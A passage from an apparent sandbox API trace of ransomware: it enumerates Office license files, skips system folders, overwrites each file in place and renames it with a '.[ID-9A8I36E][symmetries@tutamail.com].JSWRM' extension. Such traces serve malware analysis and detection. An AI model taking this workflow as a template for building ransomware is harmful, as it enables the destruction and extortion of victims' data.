(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0106.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0106.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0106.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0106.424] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe783081d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe783081d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7961b20, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Trial-ul-oob.xrm-ms", cAlternateFileName="ON6B06~1.XRM")) returned 1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.424] lstrcmpiW (lpString1="OneNoteR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0106.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0106.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241178, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0106.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.425] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0106.425] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.425] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.428] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.428] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.428] CloseHandle (hObject=0x45c) returned 1 [0106.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0106.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0106.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0106.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0106.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0106.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.428] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0106.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0106.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0106.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0106.429] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7915621, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7915621, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7adf2a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1acf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="ON2451~1.XRM")) returned 1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.429] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0106.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.430] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6863) returned 1 [0106.431] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ac0) returned 0x205850 [0106.431] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ac0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1ac0, lpOverlapped=0x0) returned 1 [0106.432] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.432] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1ac0, lpOverlapped=0x0) returned 1 [0106.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0106.433] CloseHandle (hObject=0x45c) returned 1 [0106.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0106.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0106.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0106.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0106.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0106.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0106.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.434] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7ebef60, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7ebef60, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7f578e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d63, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="ONBF9D~1.XRM")) returned 1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.434] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0106.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0106.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0106.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0106.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0106.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0106.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0106.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0106.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.435] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11619) returned 1 [0106.435] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0106.435] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0106.437] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.437] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0106.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.437] CloseHandle (hObject=0x45c) returned 1 [0106.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0106.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0106.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0106.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 